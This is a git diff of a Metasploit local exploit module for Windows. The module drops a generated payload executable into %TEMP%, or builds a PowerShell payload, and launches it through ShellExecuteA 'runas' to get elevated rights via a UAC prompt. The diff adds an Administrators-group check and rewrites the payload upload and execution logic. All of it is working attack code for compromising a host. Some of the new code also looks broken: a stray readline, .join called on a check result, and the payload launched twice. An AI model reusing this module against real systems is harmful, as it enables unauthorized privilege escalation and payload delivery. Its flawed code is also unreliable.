diff --git a/modules/exploits/windows/local/ask.rb b/modules/exploits/windows/local/ask.rb index 0711007caa..e978384d52 100644 --- a/modules/exploits/windows/local/ask.rb +++ b/modules/exploits/windows/local/ask.rb @@ -40,14 +40,42 @@ class Metasploit3 < Msf::Exploit::Local register_options([ OptString.new("FILENAME", [ false, "File name on disk"]), OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]), - OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]), + OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]), OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]), ]) end + def check + session.readline + print_status('Checking admin status...') + whoami = session.sys.process.execute('cmd /c whoami /groups', + nil, + {'Hidden' => true, 'Channelized' => true} + ) + cmdout = [] + while(cmdoutput = whoami.channel.read) + cmdout << cmdoutput + end + if cmdout.size == 0 + fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute") + else + isinadmins = cmdout.join.scan(/S-1-5-32-544/) + if isinadmins.size > 0 + print_good('Part of Administrators group! Continuing...') + return Exploit::CheckCode::Vulnerable + else + print_error('Not in admins group, cannot escalate with this module') + print_error('Exiting...') + return Exploit::CheckCode::Safe + end + end + end def exploit - + admin_check = check + if admin_check.join =~ /safe/ + return Exploit::CheckCode::Safe + end root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") open_key = session.sys.registry.open_key(root_key, base_key) lua_setting = open_key.query_value('EnableLUA') @@ -61,56 +89,38 @@ class Metasploit3 < Msf::Exploit::Local uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') case uac_level.data - when 2 - print_status "UAC is set to 'Always Notify'" - print_status "The user will be prompted, wait for them to click 'Ok'" - when 5 - print_debug "UAC is set to Default" - print_debug "The user will be prompted, wait for them to click 'Ok'" - when 0 - print_good "UAC is not enabled, no prompt for the user" + when 2 + print_status "UAC is set to 'Always Notify'" + print_status "The user will be prompted, wait for them to click 'Ok'" + when 5 + print_debug "UAC is set to Default" + print_debug "The user will be prompted, wait for them to click 'Ok'" + when 0 + print_good "UAC is not enabled, no prompt for the user" end - # # Generate payload and random names for upload # - - if datastore["TECHNIQUE"] == "EXE" - if datastore["UPLOAD"] - exe_payload = generate_exe_payload_exe - - if datastore["FILENAME"] - payload_filename = datastore["FILENAME"] - else - payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" - end - - if datastore["PATH"] - payload_path = datastore["PATH"] - else - payload_path = session.fs.file.expand_path("%TEMP%") - end - + case datastore["TECHNIQUE"] + when "EXE" + exe_payload = generate_payload_exe + payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + payload_path = datastore["PATH"] || expand_path("%TEMP%") cmd_location = "#{payload_path}\\#{payload_filename}" - if datastore["UPLOAD"] print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...") - fd = session.fs.file.new(cmd_location, "wb") - fd.write(exe_payload) - fd.close + write_file(cmd_location, exe_payload) + else + #print_error("No Upload Path!") + fail_with(Exploit::Failure::BadConfig, "No Upload Path!") + return end - - session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) - else - print_error("No Upload Path!") - return - end - else - command = cmd_psh_payload(payload.encoded) - arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","") - session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5) + command, args = cmd_location,nil + session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5) + when "PSH" + command, args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}" end + session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5) end end -